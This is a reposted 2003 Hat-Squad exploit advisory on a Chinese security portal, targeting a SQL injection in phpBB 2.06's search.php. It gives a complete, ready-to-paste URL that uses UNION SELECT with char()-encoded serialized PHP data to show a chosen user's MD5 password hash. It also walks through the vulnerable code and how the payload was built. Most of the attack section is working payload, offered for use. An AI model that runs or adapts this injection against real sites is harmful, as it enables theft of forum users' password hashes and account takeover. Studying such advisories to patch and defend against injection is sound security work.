首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpBB v2.06 search_id sql injection exploit
来源:Hat-Squad.com 作者:service 发布时间:2003-12-01  

phpBB v2.06 search_id sql injection exploit

-Hat-Squad Security Team-

Using this query you will get MD5 password hash for user[uid] as [highlight]
variable for viewtopic.php in search results page.(Works with mysql>4).


http://site.com/search.php?search_id=1%20union%20select%20concat(char
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108
,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95
,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,1
15,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,1
15,58,51,50,58,34),user_password,char
(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,5
6,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,1
15,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54
,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,9
5,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%
20user_id=[uid]/*

Details:

phpBB stores the search records in serialized format in php_search_result
table.in our case when search_id is not one of these values ('newposts'
|| 'egosearch' || 'unanswered' |)) then this routine will be run:

//code snnipset from search.php

$search_id = intval($search_id);
if ( $search_id )
{
$sql = "SELECT search_array
FROM " . SEARCH_TABLE . "
WHERE search_id = $search_id
AND session_id = '". $userdata
['session_id'] . "'";
if ( !($result = $db->sql_query($sql)) )
{

//

as you can see intval($search_id) is not safe, so the first idea would be :

search_id=1 union select user_password from php_users where user_id=[uid] /*

/* will remark the rest of Sql string (AND session_id = '". $userdata
['session_id'] . "'")

but if you run this query you will get nothing useful, seeking the rest of code
in search.php we find:

//code snnipset from search.php


$search_data = unserialize($row['search_array']);
for($i = 0; $i < count($store_vars); $i++)
{
$$store_vars[$i] = $search_data$store_vars[$i]];
}
}
}
}

//
// Look up data ...
//
if ( $search_results != '' ) {
//run search queries on post_ids,... then DISPLAY results(and our requested
password;)


feeding our query to this code the $row['search_array']) will have MD5 hash of
uid BUT remeber IT MUST BE IN Serialized format to be consider by the rest of
the code responsible for DISPLAYING result sets,So we must build a query to
return PASSWORD HASH in the form of serialized variables(To learn more about
Serialize and unserialize functions see php manual).
a simple serialized string variable $a="test" will be stored like this: a:1:
{s:0:"";s:4:"test";}
and a serialized result set in search.php has this format:
a:7:
{s:14:"search_results";s:28:"5184,,5538,,5721,,5776,,5979";s:17:"total_match_cou
nt";i:5;s:12:"split_search";a:1:{i:0;s:8:"aaaaaa";}
s:7:"sort_by";i:0;s:8:"sort_dir";s:4:"DESC";s:12:"show_results";s:6:"topics";s:1
2:"return_chars";i:200;}

we will place user_password as split_search instead of "aaaaaa". using MySql
concat() and char() functions with ASCII code format of the above serilized
object:

concat(char
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108
,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95
,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,1
15,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,1
15,58,51,50,58,34),user_password,char
(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,5
6,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,1
15,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54
,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,9
5,99,104,97,114,115,34,59,105,58,50,48,48,59,125))


and the final qury would be :
http://site.com/search.php?search_id=1%20union%20select%20concat(char
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108
,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95
,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,1
15,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,1
15,58,51,50,58,34),user_password,char
(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,5
6,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,1
15,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54
,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,9
5,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%
20user_id=[id]/*

Hat-Squad Security Team,
contact: service[at]Hat-Squad.com



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EPIC4 remote client-side stack
·phpbb_sql.pl
·85NIPrint.c 远程攻击程序
·MS03-043 - Messenger exploit b
·XP图象式样让权限提升的漏洞
·vBulletin Forum 2.3.xx SQL Inj
·RPC溢出漏洞(MS03-26)攻击代码
·Microsoft ASN.1 Library Buffer
·WS_FTP FTPD "STAT"命令远程溢出
·Serv-U \site chmod xxx \Exploi
·linx86_sendmail.c
·Serv-U MDTM Exploits
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved